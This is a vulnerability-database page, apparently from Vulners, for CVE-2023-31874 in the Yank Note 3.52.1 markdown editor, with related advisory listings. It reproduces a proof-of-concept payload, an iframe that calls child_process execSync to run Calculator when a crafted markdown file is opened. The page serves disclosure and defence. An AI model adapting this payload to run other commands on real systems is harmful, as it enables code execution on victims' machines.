Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Yank Note v3.52.1 (Electron) - Arbitrary Code Execution Vulnerability

🗓️ 23 May 2023 00:00:00Reported by 8bitsecType 
zdt
 zdt🔗 0day.today👁 164 Views

Yank Note v3.52.1 (Electron) Arbitrary Code Execution Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2023-31874
29 May 202300:15
attackerkb
CNNVD		Yank Note 安全漏洞
23 May 202300:00
cnnvd
CVE		CVE-2023-31874
28 May 202300:00
cve
Cvelist		CVE-2023-31874
28 May 202300:00
cvelist
Exploit DB		Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
23 May 202300:00
exploitdb
EUVD		EUVD-2023-36164
3 Oct 202520:07
euvd
NVD		CVE-2023-31874
29 May 202300:15
nvd
OSV		CVE-2023-31874
29 May 202300:15
osv
Packet Storm		Yank Note 3.52.1 Arbitrary Code Execution
24 May 202300:00
packetstorm
Prion		Code injection
29 May 202300:15
prion
Rows per page
# Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
# Exploit Author: 8bitsec
# CVE: CVE-2023-31874
# Vendor Homepage: yank-note.com
# Software Link: https://github.com/purocean/yn
# Version: 3.52.1
# Tested on: [Ubuntu 22.04 | Mac OS 13]

Release Date: 2023-04-27

Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement

Technical Details & Description:

A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.

Proof of Concept (PoC):
Arbitrary code execution:

Create a markdown file (.md) in any text editor and write the following payload.
Mac:
<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">

Ubuntu:
<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">

Opening the file in Yank Note will auto execute the Calculator application.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 May 2023 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 3.18.8
EPSS0.02226
SSVC
yank noteelectronarbitrary code executionvulnerabilitymarkdown editorversion controlencryptioncode snippet runningintegrated terminalcve-2023-31874githububuntumac os
164